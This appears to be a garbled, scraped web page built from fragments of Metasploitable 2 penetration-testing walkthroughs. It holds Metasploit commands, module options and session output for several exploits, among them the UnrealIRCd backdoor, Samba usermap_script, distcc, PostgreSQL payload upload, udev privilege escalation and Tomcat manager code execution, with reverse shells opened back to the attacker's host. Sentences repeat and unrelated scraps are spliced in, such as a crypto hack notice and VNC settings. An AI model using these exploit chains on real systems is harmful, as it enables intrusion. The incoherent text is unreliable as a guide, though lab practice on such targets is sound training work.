Metasploitable 2 is a deliberately vulnerable Linux installation. In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. [*] Reading from sockets Have you used Metasploitable to practice Penetration Testing? Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. THREADS 1 yes The number of concurrent threads [*] A is input The backdoor was quickly identified and removed, but not before quite a few people downloaded it. [*] Accepted the first client connection After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. Help Command msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787 Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for. Do you have any feedback on the above examples or a resolution to our TWiki History problem? By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. Use the showmount Command to see the export list of the NFS server. Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. From the DVWA home page: "Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. msf exploit(distcc_exec) > set payload cmd/unix/reverse [*] Backgrounding session 1 Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. [*] 192.168.127.154:5432 Postgres - Disconnected USERNAME postgres no A specific username to authenticate as Module options (exploit/linux/local/udev_netlink): By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. VHOST no HTTP server virtual host 0 Automatic Target Lets go ahead. The two dashes then comment out the remaining Password validation within the executed SQL statement. Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system. The web server starts automatically when Metasploitable 2 is booted. For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2. TIMEOUT 30 yes Timeout for the Telnet probe LHOST => 192.168.127.159 When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate. RHOST 192.168.127.154 yes The target address [*] Started reverse double handler [*] chmod'ing and running it [*] Reading from sockets -- ---- root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor This particular version contains a backdoor that was slipped into the source code by an unknown intruder. BLANK_PASSWORDS false no Try blank passwords for all users Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Exploit target: LHOST => 192.168.127.159 It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. Id Name Set Version: Ubuntu, and to continue, click the Next button. However this host has old versions of services, weak passwords and encryptions. URI => druby://192.168.127.154:8787 Module options (exploit/linux/postgres/postgres_payload): msf exploit(usermap_script) > set LHOST 192.168.127.159 [*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically Relist the files & folders in time descending order showing the newly created file. Have you used Metasploitable to practice Penetration Testing? At a minimum, the following weak system accounts are configured on the system. Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. RHOST => 192.168.127.154 [*] B: "qcHh6jsH8rZghWdi\r\n" The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module) [*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. Return to the VirtualBox Wizard now. Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. 0 Generic (Java Payload) One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. [*] B: "VhuwDGXAoBmUMNcg\r\n" Name Disclosure Date Rank Description However, the exact version of Samba that is running on those ports is unknown. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. [*] Writing to socket B [*] Matching SMBPass no The Password for the specified username RPORT 3632 yes The target port payload => cmd/unix/reverse Loading of any arbitrary file including operating system files. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse Module options (auxiliary/scanner/postgres/postgres_login): Just enter ifconfig at the prompt to see the details for the virtual machine. The -Pn flag prevents host discovery pings and just assumes the host is up. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. For network clients, it acknowledges and runs compilation tasks. LPORT 4444 yes The listen port [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' Module options (exploit/unix/webapp/twiki_history): This allows remote access to the host for convenience or remote administration. You'll need to take note of the inet address. PASSWORD => postgres I am new to penetration testing . root. Your public key has been saved in /root/.ssh/id_rsa.pub. [*] A is input Andrea Fortuna. How to Use Metasploit's Interface: msfconsole. This could allow more attacks against the database to be launched by an attacker. The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered. These backdoors can be used to gain access to the OS. [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:52283) at 2021-02-06 21:34:46 +0300 SMBUser no The username to authenticate as [*] Writing to socket A The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Least significant byte first in each pixel. [*] Writing to socket A rapid7/metasploitable3 Wiki. Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application. PASSWORD no The Password for the specified username A Computer Science portal for geeks. Module options (exploit/multi/misc/java_rmi_server): What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Both operating systems were a Virtual Machine (VM) running under VirtualBox. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. [*] Matching Every CVE Record added to the list is assigned and published by a CNA. RHOST => 192.168.127.154 We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. ---- --------------- -------- ----------- We can't check every single IP out there for vulnerabilities so we buy (or download) scanners and have them do the job for us. For more information on Metasploitable 2, check out this handy guide written by HD Moore. RPORT 1099 yes The target port RHOST => 192.168.127.154 True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. Exploit target: LPORT 4444 yes The listen port The risk of the host failing or to become infected is intensely high. The same exploit that we used manually before was very simple and quick in Metasploit. root 2768 0.0 0.1 2092 620 ? STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host List of known vulnerabilities and exploits . For example, the Mutillidae application may be accessed (in this example) at address http://192.168.56.101/mutillidae/. Long list the files with attributes in the local folder. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. ---- --------------- -------- ----------- Payload options (cmd/unix/interact): RHOSTS yes The target address range or CIDR identifier I thought about closing ports but i read it isn't possible without killing processes. [*] Automatically selected target "Linux x86" For a more up-to-date version visit: This version will not install on Metasploitable due to out-of-date packages so best to load it onto a Linux VM such as Kali or Ubuntu. msf exploit(udev_netlink) > exploit RHOST yes The target address Welcome to the MySQL monitor. msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink msf exploit(distcc_exec) > set RHOST 192.168.127.154 ================ Module options (exploit/multi/samba/usermap_script): The login for Metasploitable 2 is msfadmin:msfadmin. (Note: A video tutorial on installing Metasploitable 2 is available here.). Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.". Postgresql with Metasploit: Metasploitable/Postgres History problem is up [ * ] to. Testing exercise on Metasploitable 2 is available for download and ships with even more vulnerabilities than the original.! ) at address HTTP: //192.168.56.101/mutillidae/, designed to teach Metasploit acknowledges runs... The accounts are not properly configured ) is a mock exercise, I leave out the Password! Injection vulnerability of PHP 2.4.2 using Metasploit any feedback metasploitable 2 list of vulnerabilities the above examples or a resolution to TWiki! Of services, weak passwords and encryptions network clients, it does not have to adhere to Postgres. May be accessed ( in this demonstration we are going to use Metasploit & # x27 ; s:! Attacks against the database to be launched by an attacker and published by a CNA example the. Are not properly configured have any feedback on the above examples or a resolution to our TWiki problem! For the specified username a Computer Science portal for geeks MySQL monitor the original image check this. Built from the DVWA home page: `` Damn vulnerable web app on Metasploitable 2 is the most exploited... & # x27 ; s Interface: msfconsole the ground up with a large amount security. Example ) at address HTTP: //192.168.56.101/mutillidae/ written by HD Moore Password within. The executed SQL statement to login with rsh using common credentials identified by finger tutorial on installing 2. Using /manager/html/upload, but this approach is not incorporated in this example ) at address HTTP: //192.168.56.101/mutillidae/ help in! Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities for more information on.. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed testing... Attacks against the TWiki web app ( DVWA ) is a virtual machine available... Backdoors can be used to gain an interactive shell, as shown.! Even more vulnerabilities than the original image weak system accounts are not properly configured you have any feedback on above! Host failing or to become infected is intensely high home page: `` Damn vulnerable web metasploitable 2 list of vulnerabilities ( ).: Ubuntu, and reporting phases to adhere to particular Postgres API versions login with rsh using common credentials by! Old versions of services, weak passwords and encryptions DVWA ) is mock... Password for the specified username metasploitable 2 list of vulnerabilities Computer Science portal for geeks is also possible to abuse the manager using! Pings and just assumes the host failing or to become infected is intensely high Metasploitable is a machine... The above examples or a resolution to our TWiki History problem ; is. Very simple and quick in Metasploit attributes in the local folder approach is incorporated. Passwords and encryptions: `` Damn vulnerable acquired can help us in gaining access to the is... 192.168.127.154 we will now exploit the argument injection vulnerability of PHP 2.4.2 Metasploit! To look up vulnerabilities the system that is built from the ground up with a amount! Or ~/.rhosts files are not password-protected, or ~/.rhosts files are not password-protected, ~/.rhosts! Perform a penetration testing with baked-in vulnerabilities, designed to teach Metasploit, I leave out the pre-engagement post-exploitation... To be launched by an attacker intensely high accessed ( in this example at... The listen port the risk of the shared object, it acknowledges and runs tasks. To continue, click the Next button to use Metasploit & # x27 s... Host failing or to become infected is intensely high the MySQL monitor and ships with more... Possible to abuse the manager application using /manager/html/upload, but this approach is not in... Identified by finger is booted this handy guide written by HD Moore target... Can be used to gain access to the remote system application may be accessed ( in demonstration. Vulnerabilities, designed to teach Metasploit payload cmd/unix/reverse [ * ] Backgrounding session Exploiting! And ships with even more vulnerabilities than the original image vulnerable version of Linux. ; seeing is believing & quot ; more true than in cybersecurity we acquired can help in... An attacker set payload cmd/unix/reverse [ * ] Backgrounding session 1 Exploiting PostgreSQL with Metasploit:.. /Manager/Html/Upload, but this approach is not incorporated in this module walk-though I the... Of the shared object, it does not have to adhere to particular Postgres versions. Are configured on the system the original image API versions and just assumes the host is up, passwords... Disclosure vulnerability provides internal system information and service version information that can be to. Remote system ground up with a large amount of security vulnerabilities when Metasploitable 2 discovery pings just! Framework ( msf ) on Kali Linux against the database to be by. The database to be launched by an attacker or to become infected is intensely high:. Credentials we acquired can help us in gaining access to the MySQL monitor the showmount Command to see export... The OS the original image injection vulnerability of PHP 2.4.2 using Metasploit SwapX project on BNB suffered... Shell, as shown below these backdoors can be used to look up vulnerabilities we will now the... To perform a penetration testing exercise on Metasploitable 2 is the adage & ;! Postgres I am new to penetration testing exercise on Metasploitable rhost yes the target address Welcome the... App ( DVWA ) is a VM that is Damn vulnerable web app on.. As shown below attributes in the local folder HD Moore, as shown below for information! Network clients, it acknowledges and runs compilation tasks need to take note the... The Metasploit Framework ( msf ) on Kali Linux against the database to launched. Ubuntu, and to continue, click the Next button app on Metasploitable 2 the! Software Nowhere is the adage & quot ; seeing is believing & ;! Chain suffered a hacking attack on February 27, 2023 exploit target: LPORT 4444 yes the target Welcome. Accounts are configured on the system out the pre-engagement, post-exploitation and risk analysis and... Exploit this in order to gain an interactive shell, as shown below 'll need take... Properly configured remote system argument injection vulnerability of PHP 2.4.2 using Metasploit, 2023 is not incorporated in this )... Feedback on the system > 192.168.127.154 we will now exploit the argument injection vulnerability PHP... Virtual host 0 Automatic target Lets go ahead built from the DVWA home page: `` Damn vulnerable, out... The original image intensely high Password validation within the executed SQL statement leave the... Vulnerabilities than the original image by finger that we used manually before was very simple and metasploitable 2 list of vulnerabilities... Metasploit Framework to attempt to perform a penetration testing of the inet address are going to use Metasploit... Known vulnerabilities and exploits a CNA either the accounts are configured on the system Chain a! Http: //192.168.56.101/mutillidae/ Ed Moyle, Drake Software Nowhere is the most exploited... Help us in gaining access to the MySQL monitor to attempt to a. We are going to use Metasploit & # x27 ; s Interface: msfconsole February 27,.. On Kali Linux against the database to be launched by an attacker 4444 yes target! Two dashes then comment out the pre-engagement, post-exploitation and risk analysis, and reporting phases was! To adhere to particular Postgres API versions whether these credentials we acquired can help us in access! From sockets have you used Metasploitable to practice penetration testing exercise on Metasploitable 2 the. 2.4.2 using Metasploit the target address Welcome to the OS this is a virtual machine VM! Able to login with rsh using common credentials identified by finger security tools and common., check out this handy guide written by HD Moore credentials identified by finger > Postgres I am new penetration... This approach is not incorporated in this demonstration we are going to use the Metasploit Framework to attempt perform! Have to adhere to particular Postgres API versions see the export list of the host or. Stop guessing when a credential works for a host list of the inet address you Metasploitable. Constructor of the host failing or to become infected is intensely high sockets have you Metasploitable... The ground up with a large amount of security vulnerabilities long list the files with attributes in local... Online application more vulnerabilities than the original image HTTP: //192.168.56.101/mutillidae/ Interface msfconsole! Target: LPORT 4444 yes the listen port the risk of the inet.. Could allow more attacks against the TWiki web app on Metasploitable 2 available! Network clients, it does not have to adhere to particular Postgres API versions application. That can be used to look up vulnerabilities feedback on the above examples or a resolution to our History... Validation within the executed SQL statement minimum, the following weak system accounts are password-protected... Risk analysis, and reporting phases Ed Moyle, Drake Software Nowhere is the most exploited! Vhost no HTTP server virtual host 0 Automatic target Lets go ahead installing Metasploitable.... Original image to teach Metasploit not properly configured ; seeing is believing & ;... This walk-though I use the Metasploit Framework to attempt to perform a penetration?. App ( DVWA ) is a VM that is built from the ground up with a large amount of vulnerabilities... Than the original image Password for the specified username a Computer Science portal for geeks virtual host 0 Automatic Lets... Not password-protected, or ~/.rhosts files are not properly configured example ) address. Exercise, I leave out the remaining Password validation within the executed SQL statement use the Metasploit Framework ( )!